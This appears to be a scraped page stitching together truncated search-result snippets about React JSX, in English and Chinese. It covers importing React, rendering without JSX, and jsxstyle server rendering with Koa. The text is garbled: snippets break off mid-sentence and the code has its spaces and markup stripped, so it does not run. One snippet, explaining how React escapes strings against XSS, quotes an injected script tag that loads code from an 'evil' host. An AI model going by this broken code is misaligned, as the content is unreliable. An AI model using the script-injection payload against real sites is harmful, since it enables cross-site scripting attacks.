Below, we have given some important examples where we display the various uses and ways of working the jsx in the react js. In the example below, we combine the javascript, HTML, and css, which are all possible because of the jsx file type. Here in the example, we can understand the ...
Import React and JSX: In your JavaScript file (e.g., .js or .jsx), start by importing React and JSX. This is typically done at the top of the file. For example: import React from 'react'; Define react JSX Components: Components are the building blocks of React applications. You ca...
Example 2 Without JSX: constmyElement=React.createElement('h1',{},'I do not use JSX!');constroot=ReactDOM.createRoot(document.getElementById('root'));root.render(myElement); Run Example » As you can see in the first example, JSX allows us to write HTML directly within the JavaScript...
ReactDOM.render( {arr}, document.getElementById('example') ); 1. 2. 3. 4. 5. 6. 7. 8. 综上所述,我们可以这样: var names = ['Alice', 'Emily', 'Kate']; ReactDOM.render( { (name) { return Hello, {name}! }) } , document.getElementById('example') );...
// 使用JSXReact.render(fist lisecond lithird li,document.getElementById('example')); 可以看出在React中直接使用纯javascript或者使用JSX都是可以的,只是使用JSX会使搭建 React 应用更加简单,代码可读性更好。 JSX将XML语法直接加入到JavaScript代码中,能定义简洁且我们熟知的包含...
Here’s a minimal (untested!) example of jsxstyle server rendering with Koa: import{cache}from'jsxstyle';import*asKoafrom'koa';import*asReactfrom'react';import{renderToString}from'react-dom';importAppfrom'./App';// aggregate styles as they’re added to the documentletstyles='';cache.inject...
React escapes all strings in order to prevent a class of XSSattacks. So when you ask the user to give you some input and they provide a malicious string, React protects you. Take this user input, for example: varfirstname='John<scr'+'ipt src="http://evil/co.js"></scr'+'ipt>';...
React 可以渲染 HTML 标签 (strings) 或 React 组件 (classes)。 要渲染 HTML 标签,只需在 JSX 里使用小写字母开头的标签名。 varmyDivElement = ; React.render(myDivElement,document.getElementById('example')); 要渲染 React 组件,只需创建一个大写字母开头的本地变量。 varMyComponent = React.createClas...
Here’s a minimal (untested!) example of jsxstyle server rendering with Koa: import{cache}from'@jsxstyle/react';import*asKoafrom'koa';import*asReactfrom'react';import{renderToString}from'react-dom';importAppfrom'./App';// aggregate styles as they’re added to the documentletstyles='';cach...
ReactDOM.render(jsx, where to render) Here are two examples. The first uses JSX and the second does not: As you can see in the first example, JSX allows us to write HTML directly within the JavaScript code. JSX is an extension of the JavaScript language based on ES6, and is translated...